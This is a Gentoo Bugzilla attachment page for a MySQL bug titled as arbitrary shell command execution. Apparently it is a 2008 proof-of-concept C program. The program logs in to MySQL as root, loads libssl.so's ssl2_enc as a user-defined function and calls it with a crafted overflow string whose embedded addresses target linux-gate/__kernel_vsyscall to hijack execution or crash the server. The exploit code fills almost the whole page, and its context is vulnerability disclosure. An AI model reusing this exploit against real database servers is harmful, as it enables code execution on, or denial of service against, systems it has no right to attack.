Go to:
Gentoo Home
Documentation
Forums
Lists
Bugs
Planet
Store
Wiki
Get Gentoo!
Gentoo's Bugzilla – Attachment 152431 Details for
Bug 220813
dev-db/mysql: arbitrary shell command execution
Home
|
New
–
[Ex]
|
Browse
|
Search
|
Privacy Policy
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
[patch]
mysql_udf.c
mysql_udf.c (text/plain), 1.71 KB, created by
Robert Buchholz (RETIRED)
on 2008-05-08 07:42:14 UTC
(
hide
)
Description:
mysql_udf.c
Filename:
MIME Type:
Creator:
Robert Buchholz (RETIRED)
Created:
2008-05-08 07:42:14 UTC
Size:
1.71 KB
patch
obsolete
>/* > * gcc -Wall -I /usr/include/mysql -L /usr/lib/mysql -lmysqlclient \ > * -o mysql_udf mysql_udf.c > * > * Dou to the use of linux-gate, this example will only work on linux. > * > */ > >#include <stdio.h> >#include <stdlib.h> >#include <mysql.h> > >#define MY_HOST "127.0.0.1" >#define MY_USER "root" >#define MY_PASS "" > >int main(void) >{ > MYSQL mysql; > char sql[1024]; > int len; > > if(!mysql_init(&mysql)) { > return -1; > } > > mysql_options(&mysql, MYSQL_SET_CHARSET_NAME, "utf8"); > > if(!mysql_real_connect( > &mysql, MY_HOST, MY_USER, MY_PASS, NULL, 0, NULL, 0) > ) { > fprintf(stderr, "%s\n", mysql_error(&mysql)); > exit(EXIT_FAILURE); > } > > len = snprintf(sql, sizeof(sql), > "create function ssl2_enc returns integer soname 'libssl.so'" > ); > > if(mysql_real_query(&mysql, sql, len) < 0) { > fprintf(stderr, "%s\n", mysql_error(&mysql)); > exit(EXIT_FAILURE); > } > > len = snprintf(sql, sizeof(sql), > "select ssl2_enc(\"" > "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA" > "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA" > "AAAAAAAAAAAAAAAAAAAAAA%c%c%c%cAAAAAAAAAAAAAAAAAAAAAAAAAA" > 0xff, 0xe0, 0xff, 0xff, // any pointer with whatever value is OK. > 0x3c, 0xe0, 0xff, 0xff, // call addr + 0x18 > // 0xffffe03c + 0x18 -> 0xffffe400 -> __kernel_vsyscall > 0x09, 0xe1, 0xff, 0xff // addr - 0xac > ); > mysql_real_query(&mysql, sql, len); > > len = snprintf(sql, sizeof(sql), "drop function ssl2_enc"); > > if(mysql_real_query(&mysql, sql, len) < 0) { > fprintf(stderr, "You just killed the server!\n"); > exit(EXIT_FAILURE); > } > > printf("It worked!\n"); > > exit(EXIT_SUCCESS); >}
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Diff
View Attachment As Raw
Actions:
View
|
Diff
Attachments on
bug 220813
:
152431
|
152523